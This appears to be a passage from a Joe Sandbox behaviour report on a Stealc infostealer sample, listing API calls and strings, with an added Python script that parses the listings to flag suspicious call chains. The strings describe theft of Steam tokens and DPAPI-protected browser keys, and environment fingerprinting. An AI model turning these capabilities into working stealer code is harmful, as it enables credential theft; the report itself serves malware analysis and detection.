                          • Instruction Fuzzy Hash: 7A414A71B09606DBEB24CF69DC84BAAF3E8FB89305F144669EC49C7380E675E900DA50
                          APIs
                          • memset.MSVCRT ref: 0071D7D6
                          • RegOpenKeyExA.ADVAPI32(80000001,010DD148,00000000,00020119,?), ref: 0071D7F5
                          • RegQueryValueExA.ADVAPI32(?,010DDB70,00000000,00000000,00000000,000000FF), ref: 0071D819
                          • RegCloseKey.ADVAPI32(?), ref: 0071D823
                          • lstrcat.KERNEL32(?,00000000), ref: 0071D848
                          • lstrcat.KERNEL32(?,010DDBB8), ref: 0071D85C
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcat$CloseOpenQueryValuememset
                          • String ID:
                          • API String ID: 2623679115-0
                          • Opcode ID: 9f17352a2176ba307976e2d244c247815a603984b951bbe8364b5d6dfd846874
                          • Instruction ID: 429f81631e6e73b3c220b4b3e0a4e2e28fe82c0938ccb6d6b919dfbbc1abf5f4
                          • Opcode Fuzzy Hash: 9f17352a2176ba307976e2d244c247815a603984b951bbe8364b5d6dfd846874
                          • Instruction Fuzzy Hash: E141867161020CEFCB54EF68EC8ABDE77B5AB44304F408164B90997291EE74AE99CFD1
                          APIs
                          • lstrcpy.KERNEL32(00000000), ref: 00709CA8
                          • LocalAlloc.KERNEL32(00000040,?), ref: 00709CDA
                          • StrStrA.SHLWAPI(00000000,"encrypted_key":"), ref: 00709D03
                          Strings
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: AllocLocallstrcpy
                          • String ID: $"encrypted_key":"$DPAPI
                          • API String ID: 2746078483-738592651
                          • Opcode ID: d89477ce3fff88a47074096082491b8e20461c32d3d812b16d852042527903c1
                          • Instruction ID: abc413f9f4f7f9eaa66e0432ddc3538e404a16a6b5e34aac89a2fc19fc033087
                          • Opcode Fuzzy Hash: d89477ce3fff88a47074096082491b8e20461c32d3d812b16d852042527903c1
                          • Instruction Fuzzy Hash: 49415172B1020ADBDB21EF68D8496AFB7F4AF54314F044664EE15A7293EA38AD05C790
                          APIs
                          • SHGetFolderPathA.SHELL32(00000000,0000001A,00000000,00000000,?), ref: 0071EA24
                          • lstrcpy.KERNEL32(00000000,?), ref: 0071EA53
                          • lstrcat.KERNEL32(?,00000000), ref: 0071EA61
                          • lstrcat.KERNEL32(?,00731794), ref: 0071EA7A
                          • lstrcat.KERNEL32(?,010D8950), ref: 0071EA8D
                          • lstrcat.KERNEL32(?,00731794), ref: 0071EA9F
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcat$FolderPathlstrcpy
                          • String ID:
                          • API String ID: 818526691-0
                          • Opcode ID: 60548770dae395a9d95f6529ca59bc846e0c18efadd1129c0c0b3019be4e2920
                          • Instruction ID: 419d65549170aab38fd73688cb1765ae125cf619098b766a12f4731751879d23
                          • Opcode Fuzzy Hash: 60548770dae395a9d95f6529ca59bc846e0c18efadd1129c0c0b3019be4e2920
                          • Instruction Fuzzy Hash: C44199B2A20118EBCB15EB68DC49FED73B8FF48300F004564BA16A72D1DE749E859F50
                          APIs
                          • lstrcpy.KERNEL32(00000000,0072CFEC), ref: 0071ECDF
                          • lstrlen.KERNEL32(00000000), ref: 0071ECF6
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 0071ED1D
                          • lstrlen.KERNEL32(00000000), ref: 0071ED24
                          • lstrcpy.KERNEL32(00000000,steam_tokens.txt), ref: 0071ED52
                          Strings
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpy$lstrlen
                          • String ID: steam_tokens.txt
                          • API String ID: 367037083-401951677
                          • Opcode ID: 8d62368cdbdec930470bfa1a4db5de91809d1e1159b28d4d0f5cd27afe79436b
                          • Instruction ID: 655eba1eb398ed796d7d67a9538b1ad017b21edda85a22c16d4c0bd30205cff0
                          • Opcode Fuzzy Hash: 8d62368cdbdec930470bfa1a4db5de91809d1e1159b28d4d0f5cd27afe79436b
                          • Instruction Fuzzy Hash: 53311E72B24555DBC722BB7CEC4E99E77A4AF50300F045220BC45AB293DE2CDD4A4BD1
                          APIs
                          • CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000,?,?,?,?,?,0070140E), ref: 00709A9A
                          • GetFileSizeEx.KERNEL32(00000000,?,?,?,?,0070140E), ref: 00709AB0
                          • LocalAlloc.KERNEL32(00000040,?,?,?,?,0070140E), ref: 00709AC7
                          • ReadFile.KERNEL32(00000000,00000000,?,0070140E,00000000,?,?,?,0070140E), ref: 00709AE0
                          • LocalFree.KERNEL32(?,?,?,?,0070140E), ref: 00709B00
                          • CloseHandle.KERNEL32(00000000,?,?,?,0070140E), ref: 00709B07
                          Memory Dump Source
                          • Source File: 00000000.00000002.2085133924.0000000000701000.00000040.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: File$Local$AllocCloseCreateFreeHandleReadSize
                          • String ID:
                          • API String ID: 2311089104-0
                          • Opcode ID: 303180cd00fae9cf74efd0ccfe4735a2e5347861b1181dbd97bbda8e3c4df94c
                          • Instruction ID: 1000bd7f784a5ec2cb2f315b4d0fe4568c4a9d2318d3ec1125b02e88ea56dd3f
                          • Opcode Fuzzy Hash: 303180cd00fae9cf74efd0ccfe4735a2e5347861b1181dbd97bbda8e3c4df94c
                          • Instruction Fuzzy Hash: 79111CB1614209EFE710DFA9DD88EAB77ACEB44750F104259FA11E72C1EB749D50CBA0
                          APIs
                          • std::_Xinvalid_argument.LIBCPMT ref: 00725B14
                            • Part of subcall function 0072A173: std::exception::exception.LIBCMT ref: 0072A188
                            • Part of subcall function 0072A173: std::exception::exception.LIBCMT ref: 0072A1AE
                          • memmove.MSVCRT(00000000,00000000,?,00000000,00000000,00000000), ref: 00725B7C
                          • memmove.MSVCRT(00000000,?,?), ref: 00725B89
                          • memmove.MSVCRT(00000000,?,?), ref: 00725B98
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2085133924.0000000000701000.00000040.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: memmove$std::exception::exception$Xinvalid_argumentstd::_
                          • String ID: vector<T> too long
                          • API String ID: 2052693487-3788999226
                          • Opcode ID: b4544f5ed5938a093d0bb63d8a5f39d25c25c5581c34edae9e7e6ebd062ee155
                          • Instruction ID: efbf638e03b2b4762c8501bad6d085485660287095f557a6ce9e9ca1476c11ae
                          • Opcode Fuzzy Hash: b4544f5ed5938a093d0bb63d8a5f39d25c25c5581c34edae9e7e6ebd062ee155
                          • Instruction Fuzzy Hash: C54173B1B005199FCF18DF6CD895A6EB7F5EB88310F158229E905E7344E634DD01CB90
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2085133924.0000000000701000.00000040.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: String___crt$Typememset
                          • String ID:
                          • API String ID: 3530896902-3916222277
                          • Opcode ID: efc0d3826af1fec86d9b11969739cddaa536feca037ae2116563b50b322c5ad0
                          • Instruction ID: 71fe6c6714eef5b52ec0e756f3f46ed535ef0cd515c9368181530cef2b8fe2d6
                          • Opcode Fuzzy Hash: efc0d3826af1fec86d9b11969739cddaa536feca037ae2116563b50b322c5ad0
                          • Instruction Fuzzy Hash: EA412B7150076CAEDB358B259D89FFB7BFCAB45304F1C44E8D68686182E2759A45CF20
                          APIs
                          • std::_Xinvalid_argument.LIBCPMT ref: 00717D58
                            • Part of subcall function 0072A1C0: std::exception::exception.LIBCMT ref: 0072A1D5
                            • Part of subcall function 0072A1C0: std::exception::exception.LIBCMT ref: 0072A1FB
                          • std::_Xinvalid_argument.LIBCPMT ref: 00717D76
                          • std::_Xinvalid_argument.LIBCPMT ref: 00717D91
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2085133924.0000000000701000.00000040.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Xinvalid_argumentstd::_$std::exception::exception
                          • String ID: invalid string position$string too long
                          • API String ID: 3310641104-4289949731
                          • Opcode ID: 68519c8db1c047e1bbb91e8cf74018e7ae355728db774a263cf4843d03e1ff90
                          • Instruction ID: 89a8eba5c85c7d25f431aceddeb98429df3bac7ecaab23648d5657f362860c9e
                          • Opcode Fuzzy Hash: 68519c8db1c047e1bbb91e8cf74018e7ae355728db774a263cf4843d03e1ff90
                          • Instruction Fuzzy Hash: 8321D7323042049BD728DE2CE881A7AF7F5AF91710F204A6EE4918B2C1D774DC84C761
                          APIs
                          • GetProcessHeap.KERNEL32(00000000,00000104), ref: 007233EF
                          • RtlAllocateHeap.NTDLL(00000000), ref: 007233F6
                          • GlobalMemoryStatusEx.KERNEL32 ref: 00723411
                          • wsprintfA.USER32 ref: 00723437
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2085133924.0000000000701000.00000040.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Heap$AllocateGlobalMemoryProcessStatuswsprintf
                          • String ID: %d MB
                          • API String ID: 2922868504-2651807785
                          • Opcode ID: d68a1186f045fec6215ed2be78a12beb83a9b620a877544ceb922b0755697a0f
                          • Instruction ID: c8b80ec43e451ccfd7fbd7b4882263106494fc5263195d1f5f2f6aa9b82c7ef9
                          • Opcode Fuzzy Hash: d68a1186f045fec6215ed2be78a12beb83a9b620a877544ceb922b0755697a0f
                          • Instruction Fuzzy Hash: C901D8B1B18614AFDB04DFA8DD49B7EB7B8FB45710F000229F906E7380D7B85D008AA5
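The per-function "APIs" listings above are raw sandbox output. As an added triage aid (illustration written for this page, not Joe Sandbox code and not code recovered from the Stealc sample), the following Python parses entries in the exact line format the report uses, decodes the CreateFileA arguments the sandbox resolved (0x80000000 = GENERIC_READ, 1 = FILE_SHARE_READ, 3 = OPEN_EXISTING), and flags three call chains that appear in this section: the whole-file read at 00709A9A (CreateFileA, GetFileSizeEx, LocalAlloc, ReadFile, LocalFree, CloseHandle, the primitive the adjacent steam_tokens.txt string is fed to), the RAM report at 007233EF (GlobalMemoryStatusEx then wsprintfA with the "%d MB" string), and the date routine at 00721B72 further down (GetSystemTime, sscanf, SystemTimeToFileTime). The sample text is constructed from those entries; the signature names are mine, and reading the third chain as a date gate is an assumption, since the comparison itself is not in the listing.

```python
"""Parse Joe Sandbox per-function "APIs" listings and flag known call chains.
Added illustration for this report page; not Joe Sandbox's or the sample's code."""
import re
from dataclasses import dataclass
from typing import List, Optional

# Constructed sample: the "APIs" listings of three functions copied from the report
# (file-read routine, RAM-report routine, date routine), separated by the "APIs"
# header line the report puts in front of each function.
SAMPLE = """\
APIs
• CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000,?,?,?,?,?,0070140E), ref: 00709A9A
• GetFileSizeEx.KERNEL32(00000000,?,?,?,?,0070140E), ref: 00709AB0
• LocalAlloc.KERNEL32(00000040,?,?,?,?,0070140E), ref: 00709AC7
• ReadFile.KERNEL32(00000000,00000000,?,0070140E,00000000,?,?,?,0070140E), ref: 00709AE0
• LocalFree.KERNEL32(?,?,?,?,0070140E), ref: 00709B00
• CloseHandle.KERNEL32(00000000,?,?,?,0070140E), ref: 00709B07
APIs
• GetProcessHeap.KERNEL32(00000000,00000104), ref: 007233EF
• RtlAllocateHeap.NTDLL(00000000), ref: 007233F6
• GlobalMemoryStatusEx.KERNEL32 ref: 00723411
• wsprintfA.USER32 ref: 00723437
APIs
• GetSystemTime.KERNEL32(?), ref: 00721B72
  • Part of subcall function 00721820: lstrcpy.KERNEL32(00000000,0072CFEC), ref: 0072184F
• sscanf.NTDLL ref: 00721B9A
• SystemTimeToFileTime.KERNEL32(?,?), ref: 00721BB6
"""

# One report line: optional "Part of subcall function XXXXXXXX:" prefix, API.MODULE,
# optional "(args)", then "ref: ADDRESS". C++ names such as std::_Xinvalid_argument are allowed.
API_RE = re.compile(
    r"^\s*•\s*(?:Part of subcall function (?P<sub>[0-9A-F]{8}):\s*)?"
    r"(?P<api>[A-Za-z_][\w:]*)\.(?P<module>[A-Z0-9]+)"
    r"(?:\((?P<args>[^)]*)\))?,?\s+ref:\s*(?P<ref>[0-9A-F]{8})"
)


@dataclass
class ApiCall:
    api: str
    module: str
    ref: str                      # call-site address inside the dumped image
    args: List[str]               # raw argument values; "?" = not resolved by the sandbox
    subcall_of: Optional[str] = None   # set for "Part of subcall function" lines


def parse_report(text: str) -> List[List[ApiCall]]:
    """Return one list of ApiCall per "APIs" block, in listing order."""
    functions: List[List[ApiCall]] = []
    current: Optional[List[ApiCall]] = None
    for line in text.splitlines():
        if line.strip() == "APIs":
            current = []
            functions.append(current)
            continue
        m = API_RE.match(line)
        if m and current is not None:
            args = m.group("args").split(",") if m.group("args") else []
            current.append(ApiCall(m.group("api"), m.group("module"), m.group("ref"), args, m.group("sub")))
    return functions


# Win32 constants for CreateFile's dwDesiredAccess, dwShareMode and dwCreationDisposition.
GENERIC_BITS = {0x80000000: "GENERIC_READ", 0x40000000: "GENERIC_WRITE",
                0x20000000: "GENERIC_EXECUTE", 0x10000000: "GENERIC_ALL"}
SHARE_BITS = {0x1: "FILE_SHARE_READ", 0x2: "FILE_SHARE_WRITE", 0x4: "FILE_SHARE_DELETE"}
DISPOSITION = {1: "CREATE_NEW", 2: "CREATE_ALWAYS", 3: "OPEN_EXISTING",
               4: "OPEN_ALWAYS", 5: "TRUNCATE_EXISTING"}


def _flags(value: Optional[int], table: dict) -> str:
    if value is None:
        return "?"
    names = [name for bit, name in table.items() if value & bit]
    return "|".join(names) if names else hex(value)


def decode_createfile(call: ApiCall) -> dict:
    """Name parameters 2, 3 and 5 of a CreateFileA/W call; trailing values in the
    listing past the seventh parameter are stack noise and are ignored."""
    def arg(i: int) -> Optional[int]:
        try:
            return int(call.args[i], 16)
        except (IndexError, ValueError):
            return None
    disp = arg(4)
    return {"access": _flags(arg(1), GENERIC_BITS),
            "share": _flags(arg(2), SHARE_BITS),
            "disposition": DISPOSITION.get(disp, "?" if disp is None else hex(disp))}


# Ordered (not necessarily adjacent) API chains worth a second look in a stealer.
SIGNATURES = {
    "read_whole_file": ["CreateFileA", "GetFileSizeEx", "ReadFile", "CloseHandle"],
    "report_ram_mb": ["GlobalMemoryStatusEx", "wsprintfA"],
    "date_to_filetime": ["GetSystemTime", "sscanf", "SystemTimeToFileTime"],  # comparison assumed
}


def in_order(names: List[str], pattern: List[str]) -> bool:
    """True if every name in pattern occurs in names, in that relative order."""
    it = iter(names)
    return all(any(n == want for n in it) for want in pattern)


def scan(text: str) -> dict:
    """Map each signature to the first-call addresses of the functions matching it."""
    hits = {name: [] for name in SIGNATURES}
    for func in parse_report(text):
        top = [c for c in func if c.subcall_of is None]   # ignore inlined callee lines
        if not top:
            continue
        names = [c.api for c in top]
        for sig, pattern in SIGNATURES.items():
            if in_order(names, pattern):
                hits[sig].append(top[0].ref)
    return hits


if __name__ == "__main__":
    funcs = parse_report(SAMPLE)
    print(decode_createfile(funcs[0][0]))
    print(scan(SAMPLE))
```

Run against the whole report text rather than the sample to list every function that reads files end to end, and extend SIGNATURES with the other chains on this page (for instance the lstrlen, lstrcpy, StrCmpCA triples at 00717F31 and 007180BB) once you have decided what each one means.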
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2085133924.0000000000701000.00000040.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: __amsg_exit$__getptdfree
                          • String ID: Xus$Xus
                          • API String ID: 2640026729-3195049111
                          • Opcode ID: 284aedfb607e401738480c198a99cc505035778738a5c9ce7687f5abb0398ef1
                          • Instruction ID: 26225acb4e19afd6e5a745c7a4a9dc7bc7165149ab6c0381d99c40c146da623d
                          • Opcode Fuzzy Hash: 284aedfb607e401738480c198a99cc505035778738a5c9ce7687f5abb0398ef1
                          • Instruction Fuzzy Hash: 5301C072906B31FBEB28EB68B80A79DB3E07F00B20F194114E90067681CB2C6D41DBD9
                          APIs
                          Memory Dump Source
                          • Source File: 00000000.00000002.2085133924.0000000000701000.00000040.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpylstrlenmemset
                          • String ID:
                          • API String ID: 3212139465-0
                          • Opcode ID: a5a357fc22c84e8a1e2c051f43e7afb957e510f2535ed2439fae4ad314d19db2
                          • Instruction ID: d422044476ffdc246981724e4843a0247ab6723c2b27d1dbfe9a0bfad957c824
                          • Opcode Fuzzy Hash: a5a357fc22c84e8a1e2c051f43e7afb957e510f2535ed2439fae4ad314d19db2
                          • Instruction Fuzzy Hash: D18114B1E00215ABDB14DF95EC44BAEB7B5AF84300F1481A8E504A7382EB79DD46CF90
                          APIs
                          • lstrlen.KERNEL32(00000000), ref: 00717F31
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00717F60
                          • StrCmpCA.SHLWAPI(00000000,00734C3C), ref: 00717FA5
                          • StrCmpCA.SHLWAPI(00000000,00734C3C), ref: 00717FD3
                          • StrCmpCA.SHLWAPI(00000000,00734C3C), ref: 00718007
                          Memory Dump Source
                          • Source File: 00000000.00000002.2085133924.0000000000701000.00000040.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpylstrlen
                          • String ID:
                          • API String ID: 2001356338-0
                          • Opcode ID: 62d0e324a3aeaa351853ecf497b0cb5d1bb326df723ca5d66e921b03d0ee6bff
                          • Instruction ID: 4022b01829b572afa4746e383187b3cab3e4a97ec6cc014ae48000500a5826a3
                          • Opcode Fuzzy Hash: 62d0e324a3aeaa351853ecf497b0cb5d1bb326df723ca5d66e921b03d0ee6bff
                          • Instruction Fuzzy Hash: E7418E7060811ADFCB24DF6CD884EDA77B8FF54300F114199E8059B291DB79AA97CF91
                          APIs
                          • lstrlen.KERNEL32(00000000), ref: 007180BB
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 007180EA
                          • StrCmpCA.SHLWAPI(00000000,00734C3C), ref: 00718102
                          • lstrlen.KERNEL32(00000000), ref: 00718140
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 0071816F
                          Memory Dump Source
                          • Source File: 00000000.00000002.2085133924.0000000000701000.00000040.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpylstrlen
                          • String ID:
                          • API String ID: 2001356338-0
                          • Opcode ID: 9abd10fac235dbeff676f2cd6a1ad526da6cbac906c367bccfd720e948aab52e
                          • Instruction ID: 6835f89d380c748d793ae80a85ebe8822f77b60abcf23bf90b94bd49fb92ca9f
                          • Opcode Fuzzy Hash: 9abd10fac235dbeff676f2cd6a1ad526da6cbac906c367bccfd720e948aab52e
                          • Instruction Fuzzy Hash: D5415F7660010AEBCB61DF7CD988BEABBF4AB44700F10851CA845D7285EE38DD86DB91
                          APIs
                          • GetSystemTime.KERNEL32(?), ref: 00721B72
                            • Part of subcall function 00721820: lstrcpy.KERNEL32(00000000,0072CFEC), ref: 0072184F
                            • Part of subcall function 00721820: lstrlen.KERNEL32(010C6148), ref: 00721860
                            • Part of subcall function 00721820: lstrcpy.KERNEL32(00000000,00000000), ref: 00721887
                            • Part of subcall function 00721820: lstrcat.KERNEL32(00000000,00000000), ref: 00721892
                            • Part of subcall function 00721820: lstrcpy.KERNEL32(00000000,00000000), ref: 007218C1
                            • Part of subcall function 00721820: lstrlen.KERNEL32(00734FA0), ref: 007218D3
                            • Part of subcall function 00721820: lstrcpy.KERNEL32(00000000,00000000), ref: 007218F4
                            • Part of subcall function 00721820: lstrcat.KERNEL32(00000000,00734FA0), ref: 00721900
                            • Part of subcall function 00721820: lstrcpy.KERNEL32(00000000,00000000), ref: 0072192F
                          • sscanf.NTDLL ref: 00721B9A
                          • SystemTimeToFileTime.KERNEL32(?,?), ref: 00721BB6
                          • SystemTimeToFileTime.KERNEL32(?,?), ref: 00721BC6
                          • ExitProcess.KERNEL32 ref: 00721BE3
                          Memory Dump Source
                          • Source File: 00000000.00000002.2085133924.0000000000701000.00000040.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Timelstrcpy$System$Filelstrcatlstrlen$ExitProcesssscanf
                          • String ID:
                          • API String ID: 3040284667-0
                          • Opcode ID: bc999d044b6a05d9deb3be7f9809565b41320ff8c172300e11bc1b6540ad2336
                          • Instruction ID: a72e306a96171eda5843b5b486d36efa9921afc478282e365b2e54050f06d0f7
                          • Opcode Fuzzy Hash: bc999d044b6a05d9deb3be7f9809565b41320ff8c172300e11bc1b6540ad2336
                          • Instruction Fuzzy Hash: 052102B1518301AF8344DF69D88496BBBF8FFD8214F408A1EF599C3220E774D5088BA2
                          APIs
                          • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00723166
                          • RtlAllocateHeap.NTDLL(00000000), ref: 0072316D
                          • RegOpenKeyExA.ADVAPI32(80000002,010CB7E0,00000000,00020119,?), ref: 0072318C
                          • RegQueryValueExA.ADVAPI32(?,010DD288,00000000,00000000,00000000,000000FF), ref: 007231A7
                          • RegCloseKey.ADVAPI32(?), ref: 007231B1
                          Memory Dump Source
                          • Source File: 00000000.00000002.2085133924.0000000000701000.00000040.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Heap$AllocateCloseOpenProcessQueryValue
                          • String ID:
                          • API String ID: 3225020163-0
                          • Opcode ID: c704cb7ef7258fb421fbd1046fa622b00912aa8257e6ddde8ff3b357df627b3b
                          • Instruction ID: cef42bd363004863cef235099e145c74cc791e73a3b708bd4363957f66f63a74
                          • Opcode Fuzzy Hash: c704cb7ef7258fb421fbd1046fa622b00912aa8257e6ddde8ff3b357df627b3b
                          • Instruction Fuzzy Hash: 67114276A54319AFD714CF94EC45FABB7BCF744711F004129FA05D3680DB7559048BA1
                          APIs
                          • std::_Xinvalid_argument.LIBCPMT ref: 00708996
                            • Part of subcall function 0072A1C0: std::exception::exception.LIBCMT ref: 0072A1D5
                            • Part of subcall function 0072A1C0: std::exception::exception.LIBCMT ref: 0072A1FB
                          • std::_Xinvalid_argument.LIBCPMT ref: 007089CD
                            • Part of subcall function 0072A173: std::exception::exception.LIBCMT ref: 0072A188
                            • Part of subcall function 0072A173: std::exception::exception.LIBCMT ref: 0072A1AE
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2085133924.0000000000701000.00000040.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: std::exception::exception$Xinvalid_argumentstd::_
                          • String ID: invalid string position$string too long
                          • API String ID: 2002836212-4289949731
                          • Opcode ID: da2614cd5db622988f89f0ef89f7b757bf1f4842607a10def960a20a5090c715
                          • Instruction ID: 31f8cb3d3c7223b34def2472d2898ad82988f936f25905851709c7f9ad31ec44
                          • Opcode Fuzzy Hash: da2614cd5db622988f89f0ef89f7b757bf1f4842607a10def960a20a5090c715
                          • Instruction Fuzzy Hash: 1E21E6B2300650CBC7209A5CE840A6AF7E99BA1761B100B3FF1D1CB6C1DA75E841C3A7
                          APIs
                          • std::_Xinvalid_argument.LIBCPMT ref: 00708883
                            • Part of subcall function 0072A173: std::exception::exception.LIBCMT ref: 0072A188
                            • Part of subcall function 0072A173: std::exception::exception.LIBCMT ref: 0072A1AE
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2085133924.0000000000701000.00000040.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: std::exception::exception$Xinvalid_argumentstd::_
                          • String ID: vector<T> too long$yxxx$yxxx
                          • API String ID: 2002836212-1517697755
                          • Opcode ID: 1c425c2018bb6f4f39accec924d5aabefaa4ae498f21ce49b40464417e81ab2a
                          • Instruction ID: 8f8b23ac98033af2504dfd78cd6a0371b1588aeeafc9c05b56c3a5520e8347a5
                          • Opcode Fuzzy Hash: 1c425c2018bb6f4f39accec924d5aabefaa4ae498f21ce49b40464417e81ab2a
                          • Instruction Fuzzy Hash: 9A3197B5E00515DFCB08DF58C8916ADBBB6EB88350F14C269E915AB385DB34AD01CB91
                          APIs
                          • std::_Xinvalid_argument.LIBCPMT ref: 00725922
                            • Part of subcall function 0072A173: std::exception::exception.LIBCMT ref: 0072A188
                            • Part of subcall function 0072A173: std::exception::exception.LIBCMT ref: 0072A1AE
                          • std::_Xinvalid_argument.LIBCPMT ref: 00725935
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2085133924.0000000000701000.00000040.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Xinvalid_argumentstd::_std::exception::exception
                          • String ID: Sec-WebSocket-Version: 13$string too long
                          • API String ID: 1928653953-3304177573
                          • Opcode ID: cb1fa7641a1c609004d8b7927dfe5bd69a681f226ada96b036b28066642ff628
                          • Instruction ID: 7225d8f5a9d90e79b5275bd14c83306643be219da56aef80699397ffee7cf20e
                          • Opcode Fuzzy Hash: cb1fa7641a1c609004d8b7927dfe5bd69a681f226ada96b036b28066642ff628
                          • Instruction Fuzzy Hash: D5117C70304B60CBD7218B2CF800B1AB7E5AB91760F250A9AE0D187696D779E981C7A1
                          APIs
                          • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,?,0072A430,000000FF), ref: 00723D20
                          • RtlAllocateHeap.NTDLL(00000000), ref: 00723D27
                          • wsprintfA.USER32 ref: 00723D37
                            • Part of subcall function 007271E0: lstrcpy.KERNEL32(00000000,ERROR), ref: 007271FE
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2085133924.0000000000701000.00000040.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Heap$AllocateProcesslstrcpywsprintf
                          • String ID: %dx%d
                          • API String ID: 1695172769-2206825331
                          • Opcode ID: b6191b8191cc31a792a35b661aaab1ce3d7c514133b0dd4b26fd5619e00d7d4c
                          • Instruction ID: 16683d9093a940e830dc723d86bbe6cf10e4d01f02819b47ccd6d5a6e8922fc4
                          • Opcode Fuzzy Hash: b6191b8191cc31a792a35b661aaab1ce3d7c514133b0dd4b26fd5619e00d7d4c
                          • Instruction Fuzzy Hash: F401C071A48714BBE7145B54DC4AF6ABB68FB45B61F100115FA059B2D0C7B81900CAA1
                          APIs
                          • std::_Xinvalid_argument.LIBCPMT ref: 00708737
                            • Part of subcall function 0072A173: std::exception::exception.LIBCMT ref: 0072A188
                            • Part of subcall function 0072A173: std::exception::exception.LIBCMT ref: 0072A1AE
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2085133924.0000000000701000.00000040.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: std::exception::exception$Xinvalid_argumentstd::_
                          • String ID: vector<T> too long$yxxx$yxxx
                          • API String ID: 2002836212-1517697755
                          • Opcode ID: 8ce0f0dea95d200d2b37c9f807d17ce1d198b79eeb0de9d80a54f005f0b1192e
                          • Instruction ID: 16776478d2ef695b8203483186655d0caabce4dea38bfd6256908c3f2201ebfc
                          • Opcode Fuzzy Hash: 8ce0f0dea95d200d2b37c9f807d17ce1d198b79eeb0de9d80a54f005f0b1192e
                          • Instruction Fuzzy Hash: ACF0F023B000318FC384A47D8C8405EA88657E039033AE721E88AEF2DEEC34EC8281D2
                          APIs
                            • Part of subcall function 0072781C: __mtinitlocknum.LIBCMT ref: 00727832
                            • Part of subcall function 0072781C: __amsg_exit.LIBCMT ref: 0072783E
                          • ___addlocaleref.LIBCMT ref: 00728756
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2085133924.0000000000701000.00000040.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                          Joe Sandbox IDA Plugin
